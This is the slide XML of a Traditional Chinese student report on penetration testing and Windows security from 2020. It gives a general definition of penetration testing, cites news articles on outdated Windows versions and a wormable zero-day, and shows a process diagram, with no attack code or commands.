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372" r:id="rId2"/>
    <p:sldId id="373" r:id="rId3"/>
    <p:sldId id="377" r:id="rId4"/>
    <p:sldId id="375" r:id="rId5"/>
    <p:sldId id="385" r:id="rId6"/>
    <p:sldId id="386" r:id="rId7"/>
    <p:sldId id="378" r:id="rId8"/>
    <p:sldId id="374" r:id="rId9"/>
    <p:sldId id="387" r:id="rId10"/>
    <p:sldId id="379" r:id="rId11"/>
    <p:sldId id="376" r:id="rId12"/>
    <p:sldId id="395" r:id="rId13"/>
    <p:sldId id="380" r:id="rId14"/>
    <p:sldId id="471" r:id="rId15"/>
    <p:sldId id="463" r:id="rId16"/>
    <p:sldId id="470" r:id="rId17"/>
    <p:sldId id="469" r:id="rId18"/>
    <p:sldId id="468" r:id="rId19"/>
    <p:sldId id="467" r:id="rId20"/>
    <p:sldId id="466" r:id="rId21"/>
    <p:sldId id="465" r:id="rId22"/>
    <p:sldId id="464" r:id="rId23"/>
    <p:sldId id="381" r:id="rId24"/>
    <p:sldId id="504" r:id="rId25"/>
    <p:sldId id="503" r:id="rId26"/>
    <p:sldId id="382" r:id="rId27"/>
    <p:sldId id="478" r:id="rId28"/>
    <p:sldId id="477" r:id="rId29"/>
    <p:sldId id="487" r:id="rId30"/>
    <p:sldId id="479" r:id="rId31"/>
    <p:sldId id="480" r:id="rId32"/>
    <p:sldId id="481" r:id="rId33"/>
    <p:sldId id="482" r:id="rId34"/>
    <p:sldId id="483" r:id="rId35"/>
    <p:sldId id="484" r:id="rId36"/>
    <p:sldId id="485" r:id="rId37"/>
    <p:sldId id="486" r:id="rId38"/>
    <p:sldId id="488" r:id="rId39"/>
    <p:sldId id="490" r:id="rId40"/>
    <p:sldId id="489" r:id="rId41"/>
    <p:sldId id="491" r:id="rId42"/>
    <p:sldId id="492" r:id="rId43"/>
    <p:sldId id="498" r:id="rId44"/>
    <p:sldId id="383" r:id="rId45"/>
    <p:sldId id="499" r:id="rId46"/>
    <p:sldId id="500" r:id="rId47"/>
    <p:sldId id="501" r:id="rId48"/>
    <p:sldId id="502" r:id="rId4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78" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="588" y="5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53410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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254886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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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1583738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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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83725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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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2181256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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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3226840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53410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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968425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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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1014231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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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2880600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410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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3720075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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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3175620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3410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12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2091133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410D66-BAD3-40F2-AB07-240BDBD55F49}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/12</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123436771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77F3E2-8AF9-4A5B-A54C-F614ECC5DC1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試與系統安全</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>安全測試報告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808377" y="445797"/>
            <a:ext cx="7321235" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>人工智慧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>與資訊安全         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>期末平時報告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543220" y="4557744"/>
            <a:ext cx="3230372" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>報告者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>鄭勝峰</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>指導教授</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>  偉大的恩師  龍大大</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{673179C1-9F96-4939-80DE-35AC937F7F6F}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="943363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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows insecurity 2020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">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20764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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows insecurity 2020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW"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5715" y="1323975"/>
            <a:ext cx="6323240" cy="4785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方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206272" y="6362700"/>
            <a:ext cx="9382125" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://securityboulevard.com/2020/11/23-of-windows-in-use-is-old-insecure-win7-or-xp/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2067689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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows insecurity 2020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E40532E-C174-454F-BB15-C999569C458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769" t="7768" r="35254"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3531832" y="1365160"/>
            <a:ext cx="4731003" cy="4997540"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BFCFF8-8C01-481E-8FAF-0F4A51A23EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206272" y="6362700"/>
            <a:ext cx="9382125" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://securityboulevard.com/2020/03/windows-10-suffers-yet-another-wormable-zero-day/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824740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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">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195555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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Penetration Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>駭客之思考與行為模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>規劃測試內容，模擬網路駭客入侵時可能發生的各種情況（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>管理者的疏忽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>程式發展者的盲點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>等），</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試期間以各類駭客軟體工具與技術，來實際檢驗受測對象網路安全之強度、現階段系統環境與安全狀態，同時幫助發掘系統中未知的漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試作業完成後，將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>建議於系統進行修正或補強措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>。若是資安管理政策上的疏失，導致駭客攻擊成功，則針對資安管理政策進行檢討與修正。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962275" y="6075997"/>
            <a:ext cx="5953125" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://www.issdu.com.tw/service_detecting.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="478605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圓角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="220262" y="1710046"/>
            <a:ext cx="2571751" cy="942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TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="5657850"/>
            <a:ext cx="10515600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://www.mdeditor.tw/pl/pf86/zh-tw</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圓角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517481" y="1677332"/>
            <a:ext cx="2566987" cy="942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圓角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8571828" y="3776046"/>
            <a:ext cx="2552700" cy="942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圓角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3822414"/>
            <a:ext cx="2705099" cy="942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圓角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383752" y="1686542"/>
            <a:ext cx="2462214" cy="942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圓角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695824" y="3838574"/>
            <a:ext cx="2795589" cy="942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圓角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9667875" y="1640174"/>
            <a:ext cx="2409825" cy="942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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383752" y="1906264"/>
            <a:ext cx="2447924" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
